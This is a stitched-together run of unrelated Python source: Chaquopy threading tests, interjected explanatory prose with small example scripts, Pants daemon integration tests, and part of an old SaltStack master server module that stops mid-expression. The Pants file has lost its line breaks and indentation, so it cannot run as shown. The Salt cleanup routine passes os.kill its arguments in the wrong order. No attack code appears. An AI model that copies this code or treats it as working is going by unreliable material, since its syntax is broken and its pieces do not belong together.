            sleep(delay / 10)
            self.assertLess(time(), deadline)

        # If the GIL was not released, we'll never get to this point, because `blocked` is only
        # true while the Java function is actually executing.
        while JavaTestThread.blocked:  # Thread is sleeping
            sleep(delay / 10)
            self.assertLess(time(), deadline)

        thread.join()

    # The detach tests contain no assertions, but they will crash on Android if the detach
    # doesn't take place.
    def test_detach_manual(self):
        def run():
            String.valueOf(99)
            detach()
        _thread.start_new_thread(run, ())

    def test_detach_target(self):
        thread = Thread(target=lambda: String.valueOf(99))
        thread.start()
        thread.join()

    def test_detach_run(self):
        class MyThread(Thread):
            def run(self):
                String.valueOf(99)
        thread = MyThread()
        thread.start()
        thread.join()

    def test_detach_unattached(self):
        # This thread doesn't use any Java features, so should remain unattached.
        thread = Thread(target=lambda: None)
        thread.start()
        thread.join()

    def test_detach_python_exception(self):
        def run():
            raise Exception("Expected Python exception (this is not a test failure)")
        thread = Thread(target=run)
        thread.start()
        thread.join()

    def test_detach_java_exception(self):
        def run():
            from java.lang import Integer
            Integer.parseInt("Expected Java exception (this is not a test failure)")
        thread = Thread(target=run)
        thread.start()
        thread.join()

    # Test we don't run into ClassLoader issues looking up app classes from other threads.
    def test_app_class(self):
        result = []

        def run():
            result.append(jclass("com.chaquo.python.TestThreadAppClass"))
        thread = Thread(target=run)
        thread.start()
        thread.join()
        self.assertEqual("hello world", result[0].STR)
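check_gil_release works by watching a flag that is only true while the Java call is executing: if the GIL were held for the whole call, the Python-side polling loop could never observe it. A loose pure-Python analogue of that observation technique, using time.sleep (which releases the GIL) as the blocking call:

import threading
import time

blocked = threading.Event()


def blocking_call(delay):
    blocked.set()        # visible to other threads only if they get to run
    time.sleep(delay)    # releases the GIL while sleeping
    blocked.clear()


thread = threading.Thread(target=blocking_call, args=(0.1,))
thread.start()

blocked.wait(timeout=1.0)            # main thread observes the call in progress
while blocked.is_set():              # ...and observes it finishing
    time.sleep(0.01)
thread.join()
print("blocking call ran without starving the main thread")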
pantsd_integration_test.py
# Copyright 2015 Pants project contributors (see CONTRIBUTORS.md). # Licensed under the Apache License, Version 2.0 (see LICENSE). import datetime import os import re import signal import threading import time import unittest from textwrap import dedent import pytest from pants.testutil.pants_integration_test import read_pantsd_log, temporary_workdir from pants.util.contextutil import environment_as, temporary_dir, temporary_file from pants.util.dirutil import rm_rf, safe_file_dump, safe_mkdir, safe_open, touch from pants_test.pantsd.pantsd_integration_test_base import PantsDaemonIntegrationTestBase def launch_file_toucher(f): """Launch a loop to touch the given file, and return a function to call to stop and join it.""" if not os.path.isfile(f): raise AssertionError("Refusing to touch a non-file.") halt = threading.Event() def file_toucher(): while not halt.isSet(): touch(f) time.sleep(1) thread = threading.Thread(target=file_toucher) thread.daemon = True thread.start() def join(): halt.set() thread.join(timeout=10) return join class TestPantsDaemonIntegration(PantsDaemonIntegrationTestBase): hermetic = False def test_pantsd_run(self): with self.pantsd_successful_run_context(log_level="debug") as ctx: ctx.runner(["list", "3rdparty::"]) ctx.checker.assert_started() ctx.runner(["list", "3rdparty::"]) ctx.checker.assert_running() def test_pantsd_broken_pipe(self): with self.pantsd_test_context() as (workdir, pantsd_config, checker): run = self.run_pants_with_workdir( "help | head -1", workdir=workdir, config=pantsd_config, shell=True ) self.assertNotIn("broken pipe", run.stderr.lower()) checker.assert_started() def test_pantsd_pantsd_runner_doesnt_die_after_failed_run(self): with self.pantsd_test_context() as (workdir, pantsd_config, checker): # Run target that throws an exception in pants. self.run_pants_with_workdir( ["lint", "testprojects/src/python/unicode/compilation_failure"], workdir=workdir, config=pantsd_config, ).assert_failure() checker.assert_started() # Assert pantsd is in a good functional state. self.run_pants_with_workdir( ["help"], workdir=workdir, config=pantsd_config ).assert_success() checker.assert_running() def test_pantsd_lifecycle_invalidation(self): """Run with different values of daemon=True options, which should trigger restarts.""" with self.pantsd_successful_run_context() as ctx: last_pid = None for idx in range(3): # Run with a different value of a daemon=True option in each iteration. ctx.runner([f"--pantsd-invalidation-globs=ridiculous{idx}", "help"]) next_pid = ctx.checker.assert_started() if last_pid is not None: self.assertNotEqual(last_pid, next_pid) last_pid = next_pid def test_pantsd_lifecycle_non_invalidation(self): with self.pantsd_successful_run_context() as ctx: cmds = (["help"], ["--no-colors", "help"], ["help"]) last_pid = None for cmd in cmds: # Run with a CLI flag. ctx.runner(cmd) next_pid = ctx.checker.assert_started() if last_pid is not None: self.assertEqual(last_pid, next_pid) last_pid = next_pid def test_pantsd_lifecycle_non_invalidation_on_config_string(self): with temporary_dir() as dist_dir_root, temporary_dir() as config_dir: # Create a variety of config files that change an option that does _not_ affect the # daemon's fingerprint (only the Scheduler's), and confirm that it stays up. 
config_files = [ os.path.abspath(os.path.join(config_dir, f"pants.{i}.toml")) for i in range(3) ] for idx, config_file in enumerate(config_files): print(f"writing {config_file}") with open(config_file, "w") as fh: fh.write( f"""[GLOBAL]\npants_distdir = "{os.path.join(dist_dir_root, str(idx))}"\n""" ) with self.pantsd_successful_run_context() as ctx: cmds = [[f"--pants-config-files={f}", "help"] for f in config_files] last_pid = None for cmd in cmds: ctx.runner(cmd) next_pid = ctx.checker.assert_started() if last_pid is not None: self.assertEqual(last_pid, next_pid) last_pid = next_pid def test_pantsd_lifecycle_shutdown_for_broken_scheduler(self): with self.pantsd_test_context() as (workdir, config, checker): # Run with valid options. self.run_pants_with_workdir(["help"], workdir=workdir, config=config).assert_success() checker.assert_started() # And again with invalid scheduler-fingerprinted options that trigger a re-init. self.run_pants_with_workdir( ["--backend-packages=nonsensical", "help"], workdir=workdir, config=config ).assert_failure() checker.assert_stopped() def test_pantsd_aligned_output(self) -> None: # Set for pytest output display. self.maxDiff = None cmds = [["help", "goals"], ["help", "targets"], ["roots"]] non_daemon_runs = [self.run_pants(cmd) for cmd in cmds] with self.pantsd_successful_run_context() as ctx: daemon_runs = [ctx.runner(cmd) for cmd in cmds] ctx.checker.assert_started() for cmd, run in zip(cmds, daemon_runs): print(f"(cmd, run) = ({cmd}, {run.stdout}, {run.stderr_data})") self.assertNotEqual(run.stdout, "", f"Empty stdout for {cmd}") for run_pair in zip(non_daemon_runs, daemon_runs): non_daemon_stdout = run_pair[0].stdout daemon_stdout = run_pair[1].stdout for line_pair in zip(non_daemon_stdout.splitlines(), daemon_stdout.splitlines()): assert line_pair[0] == line_pair[1] @unittest.skip("flaky: https://github.com/pantsbuild/pants/issues/7622") def test_pantsd_filesystem_invalidation(self): """Runs with pantsd enabled, in a loop, while another thread invalidates files.""" with self.pantsd_successful_run_context() as ctx: cmd = ["list", "::"] ctx.runner(cmd) ctx.checker.assert_started() # Launch a separate thread to poke files in 3rdparty. join = launch_file_toucher("3rdparty/jvm/com/google/auto/value/BUILD") # Repeatedly re-list 3rdparty while the file is being invalidated. for _ in range(0, 16): ctx.runner(cmd) ctx.checker.assert_running() join() def test_pantsd_client_env_var_is_inherited_by_pantsd_runner_children(self): EXPECTED_KEY = "TEST_ENV_VAR_FOR_PANTSD_INTEGRATION_TEST" EXPECTED_VALUE = "333" with self.pantsd_successful_run_context() as ctx: # First, launch the daemon without any local env vars set. ctx.runner(["help"]) ctx.checker.assert_started() # Then, set an env var on the secondary call. # We additionally set the `HERMETIC_ENV` env var to allow the integration test harness # to pass this variable through. 
env = { EXPECTED_KEY: EXPECTED_VALUE, "HERMETIC_ENV": EXPECTED_KEY, } with environment_as(**env): result = ctx.runner( ["run", "testprojects/src/python/print_env", "--", EXPECTED_KEY] ) ctx.checker.assert_running() self.assertEqual(EXPECTED_VALUE, "".join(result.stdout).strip()) def test_pantsd_launch_env_var_is_not_inherited_by_pantsd_runner_children(self): with self.pantsd_test_context() as (workdir, pantsd_config, checker): with environment_as(NO_LEAKS="33"): self.run_pants_with_workdir( ["help"], workdir=workdir, config=pantsd_config ).assert_success() checker.assert_started() self.run_pants_with_workdir( ["run", "testprojects/src/python/print_env", "--", "NO_LEAKS"], workdir=workdir, config=pantsd_config, ).assert_failure() checker.assert_running() def test_pantsd_touching_a_file_does_not_restart_daemon(self): test_file = "testprojects/src/python/print_env/main.py" config = { "GLOBAL": {"pantsd_invalidation_globs": '["testprojects/src/python/print_env/*"]'} } with self.pantsd_successful_run_context(extra_config=config) as ctx: ctx.runner(["help"]) ctx.checker.assert_started() # Let any fs events quiesce. time.sleep(5) ctx.checker.assert_running() touch(test_file) # Permit ample time for the async file event propagate in CI. time.sleep(10) ctx.checker.assert_running() def test_pantsd_invalidation_file_tracking(self): test_dir = "testprojects/src/python/print_env" config = {"GLOBAL": {"pantsd_invalidation_globs": f'["{test_dir}/*"]'}} with self.pantsd_successful_run_context(extra_config=config) as ctx: ctx.runner(["help"]) ctx.checker.assert_started() # Let any fs events quiesce. time.sleep(5) ctx.checker.assert_running() def full_pantsd_log(): return "\n".join(read_pantsd_log(ctx.workdir)) # Create a new file in test_dir with temporary_file(suffix=".py", binary_mode=False, root_dir=test_dir) as temp_f: temp_f.write("import that\n") temp_f.close() ctx.checker.assert_stopped() self.assertIn("saw filesystem changes covered by invalidation globs", full_pantsd_log()) def test_pantsd_invalidation_pants_toml_file(self): # Test tmp_pants_toml (--pants-config-files=$tmp_pants_toml)'s removal tmp_pants_toml = os.path.abspath("testprojects/test_pants.toml") # Create tmp_pants_toml file with safe_open(tmp_pants_toml, "w") as f: f.write("[DEFAULT]\n") with self.pantsd_successful_run_context() as ctx: ctx.runner([f"--pants-config-files={tmp_pants_toml}", "help"]) ctx.checker.assert_started() time.sleep(10) # Delete tmp_pants_toml os.unlink(tmp_pants_toml) ctx.checker.assert_stopped() def test_pantsd_pid_deleted(self): with self.pantsd_successful_run_context() as ctx: ctx.runner(["help"]) ctx.checker.assert_started() # Let any fs events quiesce. time.sleep(10) ctx.checker.assert_running() subprocess_dir = ctx.pantsd_config["GLOBAL"]["pants_subprocessdir"] os.unlink(os.path.join(subprocess_dir, "pantsd", "pid")) ctx.checker.assert_stopped() def test_pantsd_pid_change(self): with self.pantsd_successful_run_context() as ctx: ctx.runner(["help"]) ctx.checker.assert_started() # Let any fs events quiesce. time.sleep(10) ctx.checker.assert_running() subprocess_dir = ctx.pantsd_config["GLOBAL"]["pants_subprocessdir"] pidpath = os.path.join(subprocess_dir, "pantsd", "pid") with open(pidpath, "w") as f: f.write("9") ctx.checker.assert_stopped() # Remove the pidfile so that the teardown script doesn't try to kill process 9. 
os.unlink(pidpath) @pytest.mark.skip(reason="flaky: https://github.com/pantsbuild/pants/issues/8193") def test_pantsd_memory_usage(self): """Validates that after N runs, memory usage has increased by no more than X percent.""" number_of_runs = 10 max_memory_increase_fraction = 0.40 # TODO https://github.com/pantsbuild/pants/issues/7647 with self.pantsd_successful_run_context() as ctx: # NB: This doesn't actually run against all testprojects, only those that are in the chroot, # i.e. explicitly declared in this test file's BUILD. cmd = ["list", "testprojects::"] ctx.runner(cmd).assert_success() initial_memory_usage = ctx.checker.current_memory_usage() for _ in range(number_of_runs): ctx.runner(cmd).assert_success() ctx.checker.assert_running() final_memory_usage = ctx.checker.current_memory_usage() self.assertTrue( initial_memory_usage <= final_memory_usage, "Memory usage inverted unexpectedly: {} > {}".format( initial_memory_usage, final_memory_usage ), ) increase_fraction = (float(final_memory_usage) / initial_memory_usage) - 1.0 self.assertTrue( increase_fraction <= max_memory_increase_fraction, "Memory usage increased more than expected: {} -> {}: {} actual increase (expected < {})".format( initial_memory_usage, final_memory_usage, increase_fraction, max_memory_increase_fraction, ), ) def test_pantsd_max_memory_usage(self): """Validates that the max_memory_usage setting is respected.""" # We set a very, very low max memory usage, which forces pantsd to restart immediately. max_memory_usage_bytes = 130 with self.pantsd_successful_run_context() as ctx: # TODO: We run the command, but we expect it to race pantsd shutting down, so we don't # assert success. https://github.com/pantsbuild/pants/issues/8200 will address waiting # until after the current command completes to invalidate the scheduler, at which point # we can assert success here. ctx.runner( [f"--pantsd-max-memory-usage={max_memory_usage_bytes}", "list", "testprojects::"] ) # Assert that a pid file is written, but that the server stops afterward. ctx.checker.assert_started_and_stopped() def test_pantsd_invalidation_stale_sources(self): test_path = "daemon_correctness_test_0001" test_build_file = os.path.join(test_path, "BUILD") test_src_file = os.path.join(test_path, "some_file.py") filedeps_cmd = ["--files-not-found-behavior=warn", "filedeps", test_path] try: with self.pantsd_successful_run_context() as ctx: safe_mkdir(test_path, clean=True) ctx.runner(["help"]) ctx.checker.assert_started() safe_file_dump( test_build_file, "python_library(sources=['some_non_existent_file.py'])" ) non_existent_file = os.path.join(test_path, "some_non_existent_file.py") result = ctx.runner(filedeps_cmd) ctx.checker.assert_running() assert non_existent_file not in result.stdout safe_file_dump(test_build_file, "python_library(sources=['*.py'])") result = ctx.runner(filedeps_cmd) ctx.checker.assert_running() assert non_existent_file not in result.stdout safe_file_dump(test_src_file, "print('hello')\n") result = ctx.runner(filedeps_cmd) ctx.checker.assert_running() assert test_src_file in result.stdout finally: rm_rf(test_path) @unittest.skip("TODO https://github.com/pantsbuild/pants/issues/7654") def test_pantsd_parse_exception_success(self): # This test covers the case described in #6426, where a run that is failing fast due to an # exception can race other completing work. We expect all runs to fail due to the error # that has been introduced, but none of them should hang. 
test_path = "testprojects/3rdparty/this_is_definitely_not_a_valid_directory" test_build_file = os.path.join(test_path, "BUILD") invalid_symbol = "this_is_definitely_not_a_valid_symbol" try: safe_mkdir(test_path, clean=True) safe_file_dump(test_build_file, f"{invalid_symbol}()") for _ in range(3): with self.pantsd_run_context(success=False) as ctx: result = ctx.runner(["list", "testprojects::"]) ctx.checker.assert_started() self.assertIn(invalid_symbol, result.stderr_data) finally: rm_rf(test_path) @unittest.skip("TODO https://github.com/pantsbuild/pants/issues/7654") def test_pantsd_multiple_parallel_runs(self): with self.pantsd_test_context() as (workdir, config, checker): file_to_make = os.path.join(workdir, "some_magic_file") waiter_handle = self.run_pants_with_workdir_without_waiting( ["run", "testprojects/src/python/coordinated_runs:waiter", "--", file_to_make], workdir=workdir, config=config, ) checker.assert_started() checker.assert_pantsd_runner_started(waiter_handle.process.pid) creator_handle = self.run_pants_with_workdir_without_waiting( ["run", "testprojects/src/python/coordinated_runs:creator", "--", file_to_make], workdir=workdir, config=config, ) creator_handle.join().assert_success() waiter_handle.join().assert_success() def _assert_pantsd_keyboardinterrupt_signal(self, signum, regexps=[], quit_timeout=None): """Send a signal to the thin pailgun client and observe the error messaging. :param int signum: The signal to send. :param regexps: Assert that all of these regexps match somewhere in stderr. :type regexps: list of str :param float quit_timeout: The duration of time to wait for the pailgun client to flush all of its output and die after being killed. """ # TODO: This tests that pantsd processes actually die after the thin client receives the # specified signal. with self.pantsd_test_context() as (workdir, config, checker): # Launch a run that will wait for a file to be created (but do not create that file). file_to_make = os.path.join(workdir, "some_magic_file") if quit_timeout is not None: timeout_args = [f"--pantsd-pailgun-quit-timeout={quit_timeout}"] else: timeout_args = [] argv = timeout_args + [ "run", "testprojects/src/python/coordinated_runs:waiter", "--", file_to_make, ] waiter_handle = self.run_pants_with_workdir_without_waiting( argv, workdir=workdir, config=config ) client_pid = waiter_handle.process.pid checker.assert_started() checker.assert_pantsd_runner_started(client_pid) # This should kill the pantsd processes through the RemotePantsRunner signal handler. os.kill(client_pid, signum) waiter_run = waiter_handle.join() waiter_run.assert_failure() for regexp in regexps: self.assertRegex(waiter_run.stderr, regexp) time.sleep(5) checker.assert_stopped() @unittest.skip("flaky: https://github.com/pantsbuild/pants/issues/7554") def test_pantsd_sigterm(self): self._assert_pantsd_keyboardinterrupt_signal( signal.SIGTERM, regexps=[ "\\[INFO\\] Sending SIGTERM to pantsd with pid [0-9]+, waiting up to 5\\.0 seconds before sending SIGKILL\\.\\.\\.", re.escape( "\nSignal {signum} (SIGTERM) was raised. Exiting with failure.\n".format( signum=signal.SIGTERM ) ), """ Interrupted by user: Interrupted by user over pailgun client! 
$""", ], ) @unittest.skip("flaky: https://github.com/pantsbuild/pants/issues/7572") def test_pantsd_sigquit(self): self._assert_pantsd_keyboardinterrupt_signal( signal.SIGQUIT, regexps=[ "\\[INFO\\] Sending SIGQUIT to pantsd with pid [0-9]+, waiting up to 5\\.0 seconds before sending SIGKILL\\.\\.\\.", re.escape( "\nSignal {signum} (SIGQUIT) was raised. Exiting with failure.\n".format( signum=signal.SIGQUIT ) ), """ Interrupted by user: Interrupted by user over pailgun client! $""", ], ) @unittest.skip("flaky: https://github.com/pantsbuild/pants/issues/7547") def test_pantsd_sigint(self): self._assert_pantsd_keyboardinterrupt_signal( signal.SIGINT, regexps=[ """\ \\[INFO\\] Sending SIGINT to pantsd with pid [0-9]+, waiting up to 5\\.0 seconds before sending SIGKILL\\.\\.\\. Interrupted by user. Interrupted by user: Interrupted by user over pailgun client! $""" ], ) @unittest.skip("flaky: https://github.com/pantsbuild/pants/issues/7457") def test_signal_pailgun_stream_timeout(self): # NB: The actual timestamp has the date and time at sub-second granularity. The date is just # used here since that is known in advance in order to assert that the timestamp is well-formed. today = datetime.date.today().isoformat() self._assert_pantsd_keyboardinterrupt_signal( signal.SIGINT, regexps=[ """\ \\[INFO\\] Sending SIGINT to pantsd with pid [0-9]+, waiting up to 0\\.01 seconds before sending SIGKILL\\.\\.\\. Interrupted by user\\. [^ ]* \\[WARN\\] timed out when attempting to gracefully shut down the remote client executing \ "'pantsd.*'"\\. sending SIGKILL to the remote client at pid: [0-9]+\\. message: iterating \ over bytes from nailgun timed out with timeout interval 0\\.01 starting at {today}T[^\n]+, \ overtime seconds: [^\n]+ Interrupted by user: Interrupted by user over pailgun client! """.format( today=re.escape(today) ) ], # NB: Make the timeout very small to ensure the warning message will reliably occur in CI! quit_timeout=1e-6, ) @unittest.skip( reason="This started consistently hanging on Jan. 13, 2020 for some unknown reason." ) def test_sigint_kills_request_waiting_for_lock(self): """Test that, when a pailgun request is blocked waiting for another one to end, sending SIGINT to the blocked run will kill it. Regression test for issue: #7920 """ config = {"GLOBAL": {"pantsd_timeout_when_multiple_invocations": -1, "level": "debug"}} with self.pantsd_test_context(extra_config=config) as (workdir, config, checker): # Run a repl, so that any other run waiting to acquire the daemon lock waits forever. first_run_handle = self.run_pants_with_workdir_without_waiting( command=["repl", "examples/src/python/example/hello::"], workdir=workdir, config=config, ) checker.assert_started() checker.assert_running() blocking_run_handle = self.run_pants_with_workdir_without_waiting( command=["goals"], workdir=workdir, config=config ) # Block until the second request is waiting for the lock. blocked = True while blocked: log = "\n".join(read_pantsd_log(workdir)) if "didn't acquire the lock on the first try, polling." in log: blocked = False # NB: This sleep is totally deterministic, it's just so that we don't spend too many cycles # busy waiting. time.sleep(0.1) # Sends SIGINT to the run that is waiting. blocking_run_client_pid = blocking_run_handle.process.pid os.kill(blocking_run_client_pid, signal.SIGINT) blocking_run_handle.join() # Check that pantsd is still serving the other request. checker.assert_running() # Send exit() to the repl, and exit it. 
result = first_run_handle.join(stdin_data="exit()") result.assert_success() checker.assert_running() def test_pantsd_unicode_environment(self): with self.pantsd_successful_run_context(extra_env={"XXX": "¡"}) as ctx: result = ctx.runner(["help"]) ctx.checker.assert_started() result.assert_success() # This is a regression test for a bug where we would incorrectly detect a cycle if two targets swapped their # dependency relationship (#7404). def test_dependencies_swap(self): template = dedent( """ python_library( name = 'A', source = 'A.py', {a_deps} ) python_library( name = 'B', source = 'B.py', {b_deps} ) """ ) with self.pantsd_successful_run_context() as ctx: with temporary_dir(".") as directory: safe_file_dump(os.path.join(directory, "A.py"), mode="w") safe_file_dump(os.path.join(directory, "B.py"), mode="w") if directory.startswith("./"): directory = directory[2:] def list_and_verify(): result = ctx.runner(["list", f"{directory}:"]) ctx.checker.assert_started() result.assert_success() expected_targets = {f"{directory}:{target}" for target in ("A", "B")} self.assertEqual(expected_targets, set(result.stdout.strip().split("\n"))) with open(os.path.join(directory, "BUILD"), "w") as f: f.write(template.format(a_deps='dependencies = [":B"],', b_deps="")) list_and_verify() with open(os.path.join(directory, "BUILD"), "w") as f: f.write(template.format(a_deps="", b_deps='dependencies = [":A"],')) list_and_verify() def test_concurrent_overrides_pantsd(self): """Tests that the --concurrent flag overrides the --pantsd flag, because we don't allow concurrent runs under pantsd.""" config = {"GLOBAL": {"concurrent": True, "pantsd": True}} with temporary_workdir() as workdir: pants_run = self.run_pants_with_workdir( ["help", "goals"], workdir=workdir, config=config ) pants_run.assert_success() pantsd_log_location = os.path.join(workdir, "pantsd", "pantsd.log") self.assertFalse(os.path.exists(pantsd_log_location)) def test_unhandled_exceptions_only_log_exceptions_once(self): """Tests that the unhandled exceptions triggered by LocalPantsRunner instances don't manifest as a PantsRunFinishedWithFailureException. That is, that we unset the global Exiter override set by LocalPantsRunner before we try to log the exception. This is a regression test for the most glaring case of https://github.com/pantsbuild/pants/issues/7597. """ with self.pantsd_run_context(success=False) as ctx: result = ctx.runner(["run", "testprojects/src/python/bad_requirements:use_badreq"]) ctx.checker.assert_running() result.assert_failure() # Assert that the desired exception has been triggered once. self.assertRegex(result.stderr_data, r"ERROR:.*badreq==99.99.99") # Assert that it has only been triggered once. self.assertNotIn( "During handling of the above exception, another exception occurred:", result.stderr_data, ) self.assertNotIn( "pants.bin.daemon_pants_runner._PantsRunFinishedWithFailureException: Terminated with 1", result.stderr_data, )
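launch_file_toucher at the top of this file is a reusable shape: a daemon thread that does periodic work until an Event tells it to stop, returned together with a closure that halts and joins it. A generic sketch of that shape, with a hypothetical poke callback instead of touch:

import threading
import time


def launch_background_loop(poke, interval=1.0):
    """Run poke() every `interval` seconds until the returned `stop` is called."""
    halt = threading.Event()

    def loop():
        while not halt.is_set():
            poke()
            halt.wait(interval)      # sleep, but wake up early if halted

    thread = threading.Thread(target=loop, daemon=True)
    thread.start()

    def stop(timeout=10):
        halt.set()
        thread.join(timeout=timeout)

    return stop


stop = launch_background_loop(lambda: print("tick"), interval=0.2)
time.sleep(1)
stop()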
master.py
''' This module contains all of the routines needed to set up a master server, this involves preparing the three listeners and the workers needed by the master. ''' # Import python modules import os import re import time import errno import signal import shutil import logging import hashlib import tempfile import datetime import subprocess import multiprocessing # Import zeromq import zmq # Import Third Party Libs import yaml # RSA Support from M2Crypto import RSA # Import salt modules import salt.crypt import salt.utils import salt.client import salt.payload import salt.pillar import salt.state import salt.runner import salt.utils.event from salt.utils.debug import enable_sigusr1_handler log = logging.getLogger(__name__) def clean_proc(proc, wait_for_kill=10): ''' Generic method for cleaning up multiprocessing procs ''' # NoneType and other fun stuff need not apply if not proc: return try: waited = 0 while proc.is_alive(): proc.terminate() waited += 1 time.sleep(0.1) if proc.is_alive() and (waited >= wait_for_kill): log.error(('Process did not die with terminate(): {0}' .format(proc.pid))) os.kill(signal.SIGKILL, proc.pid) except (AssertionError, AttributeError) as e: # Catch AssertionError when the proc is evaluated inside the child # Catch AttributeError when the process dies between proc.is_alive() # and proc.terminate() and turns into a NoneType pass class MasterExit(SystemExit): ''' Named exit exception for the master process exiting ''' pass class SMaster(object): ''' Create a simple salt-master, this will generate the top level master ''' def __init__(self, opts): ''' Create a salt master server instance ''' self.opts = opts self.master_key = salt.crypt.MasterKeys(self.opts) self.key = self.__prep_key() self.crypticle = self.__prep_crypticle() def __prep_crypticle(self): ''' Return the crypticle used for AES ''' return salt.crypt.Crypticle(self.opts, self.opts['aes']) def __prep_key(self): ''' A key needs to be placed in the filesystem with permissions 0400 so clients are required to run as root. 
''' log.info('Preparing the root key for local communication') keyfile = os.path.join(self.opts['cachedir'], '.root_key') if os.path.isfile(keyfile): with open(keyfile, 'r') as fp_: return fp_.read() else: key = salt.crypt.Crypticle.generate_key_string() cumask = os.umask(191) with open(keyfile, 'w+') as fp_: fp_.write(key) os.umask(cumask) os.chmod(keyfile, 256) return key class Master(SMaster): ''' The salt master server ''' def __init__(self, opts): ''' Create a salt master server instance ''' SMaster.__init__(self, opts) def _clear_old_jobs(self): ''' Clean out the old jobs ''' if self.opts['keep_jobs'] == 0: return jid_root = os.path.join(self.opts['cachedir'], 'jobs') while True: cur = "{0:%Y%m%d%H}".format(datetime.datetime.now()) for top in os.listdir(jid_root): t_path = os.path.join(jid_root, top) for final in os.listdir(t_path): f_path = os.path.join(t_path, final) jid_file = os.path.join(f_path, 'jid') if not os.path.isfile(jid_file): continue with open(jid_file, 'r') as fn_: jid = fn_.read() if len(jid) < 18: # Invalid jid, scrub the dir shutil.rmtree(f_path) elif int(cur) - int(jid[:10]) > self.opts['keep_jobs']: shutil.rmtree(f_path) try: time.sleep(60) except KeyboardInterrupt: break def start(self): ''' Turn on the master server components ''' enable_sigusr1_handler() log.warn('Starting the Salt Master') clear_old_jobs_proc = multiprocessing.Process( target=self._clear_old_jobs) clear_old_jobs_proc.start() reqserv = ReqServer( self.opts, self.crypticle, self.key, self.master_key) reqserv.start_publisher() reqserv.start_event_publisher() def sigterm_clean(signum, frame): ''' Cleaner method for stopping multiprocessing processes when a SIGTERM is encountered. This is required when running a salt master under a process minder like daemontools ''' mypid = os.getpid() log.warn(('Caught signal {0}, stopping the Salt Master' .format(signum))) clean_proc(clear_old_jobs_proc) clean_proc(reqserv.publisher) clean_proc(reqserv.eventpublisher) for proc in reqserv.work_procs: clean_proc(proc) raise MasterExit signal.signal(signal.SIGTERM, sigterm_clean) try: reqserv.run() except KeyboardInterrupt: # Shut the master down gracefully on SIGINT log.warn('Stopping the Salt Master') raise SystemExit('\nExiting on Ctrl-c') class Publisher(multiprocessing.Process): ''' The publishing interface, a simple zeromq publisher that sends out the commands. 
''' def __init__(self, opts): super(Publisher, self).__init__() self.opts = opts def run(self): ''' Bind to the interface specified in the configuration file ''' # Set up the context context = zmq.Context(1) # Prepare minion publish socket pub_sock = context.socket(zmq.PUB) pub_sock.setsockopt(zmq.HWM, 1) pub_uri = 'tcp://{0[interface]}:{0[publish_port]}'.format(self.opts) # Prepare minion pull socket pull_sock = context.socket(zmq.PULL) pull_uri = 'ipc://{0}'.format( os.path.join(self.opts['sock_dir'], 'publish_pull.ipc') ) # Start the minion command publisher log.info('Starting the Salt Publisher on {0}'.format(pub_uri)) pub_sock.bind(pub_uri) pull_sock.bind(pull_uri) # Restrict access to the socket os.chmod( os.path.join(self.opts['sock_dir'], 'publish_pull.ipc'), 448 ) try: while True: # Catch and handle EINTR from when this process is sent # SIGUSR1 gracefully so we don't choke and die horribly try: package = pull_sock.recv() pub_sock.send(package) except zmq.ZMQError as exc: if exc.errno == errno.EINTR: continue raise exc except KeyboardInterrupt: pub_sock.close() pull_sock.close() class ReqServer(object): ''' Starts up the master request server, minions send results to this interface. ''' def __init__(self, opts, crypticle, key, mkey): self.opts = opts self.master_key = mkey self.context = zmq.Context(self.opts['worker_threads']) # Prepare the zeromq sockets self.uri = 'tcp://%(interface)s:%(ret_port)s' % self.opts self.clients = self.context.socket(zmq.ROUTER) self.workers = self.context.socket(zmq.DEALER) self.w_uri = 'ipc://{0}'.format( os.path.join(self.opts['sock_dir'], 'workers.ipc') ) # Prepare the AES key self.key = key self.crypticle = crypticle def __bind(self): ''' Binds the reply server ''' log.info('Setting up the master communication server') self.clients.bind(self.uri) self.work_procs = [] for ind in range(int(self.opts['worker_threads'])): self.work_procs.append(MWorker(self.opts, self.master_key, self.key, self.crypticle)) for ind, proc in enumerate(self.work_procs): log.info('Starting Salt worker process {0}'.format(ind)) proc.start() self.workers.bind(self.w_uri) while True: try: zmq.device(zmq.QUEUE, self.clients, self.workers) except zmq.ZMQError as exc: if exc.errno == errno.EINTR: continue raise exc def start_publisher(self): ''' Start the salt publisher interface ''' # Start the publisher self.publisher = Publisher(self.opts) self.publisher.start() def start_event_publisher(self): ''' Start the salt publisher interface ''' # Start the publisher self.eventpublisher = salt.utils.event.EventPublisher(self.opts) self.eventpublisher.start() def run(self): ''' Start up the ReqServer ''' self.__bind() class MWorker(multiprocessing.Process): ''' The worker multiprocess instance to manage the backend operations for the salt master. 
''' def __init__(self, opts, mkey, key, crypticle): multiprocessing.Process.__init__(self) self.opts = opts self.serial = salt.payload.Serial(opts) self.crypticle = crypticle self.mkey = mkey self.key = key def __bind(self): ''' Bind to the local port ''' context = zmq.Context(1) socket = context.socket(zmq.REP) w_uri = 'ipc://{0}'.format( os.path.join(self.opts['sock_dir'], 'workers.ipc') ) log.info('Worker binding to socket {0}'.format(w_uri)) try: socket.connect(w_uri) while True: try: package = socket.recv() payload = self.serial.loads(package) ret = self.serial.dumps(self._handle_payload(payload)) socket.send(ret) # Properly handle EINTR from SIGUSR1 except zmq.ZMQError as exc: if exc.errno == errno.EINTR: continue raise exc except KeyboardInterrupt: socket.close() def _handle_payload(self, payload): ''' The _handle_payload method is the key method used to figure out what needs to be done with communication to the server ''' key = load = None try: key = payload['enc'] load = payload['load'] except KeyError: return '' return {'aes': self._handle_aes, 'pub': self._handle_pub, 'clear': self._handle_clear}[key](load) def _handle_clear(self, load): ''' Take care of a cleartext command ''' log.info('Clear payload received with command %(cmd)s', load) return getattr(self.clear_funcs, load['cmd'])(load) def _handle_pub(self, load): ''' Handle a command sent via a public key pair ''' log.info('Pubkey payload received with command %(cmd)s', load) def _handle_aes(self, load): ''' Handle a command sent via an aes key ''' try: data = self.crypticle.loads(load) except Exception: return '' if 'cmd' not in data: log.error('Received malformed command {0}'.format(data)) return {} log.info('AES payload received with command {0}'.format(data['cmd'])) return self.aes_funcs.run_func(data['cmd'], data) def run(self): ''' Start a Master Worker ''' self.clear_funcs = ClearFuncs( self.opts, self.key, self.mkey, self.crypticle) self.aes_funcs = AESFuncs(self.opts, self.crypticle) self.__bind() class AESFuncs(object): ''' Set up functions that are available when the load is encrypted with AES ''' # The AES Functions: # def __init__(self, opts, crypticle): self.opts = opts self.event = salt.utils.event.SaltEvent( self.opts['sock_dir'], 'master' ) self.serial = salt.payload.Serial(opts) self.crypticle = crypticle # Make a client self.local = salt.client.LocalClient(self.opts['conf_file']) def __find_file(self, path, env='base'): ''' Search the environment for the relative path ''' fnd = {'path': '', 'rel': 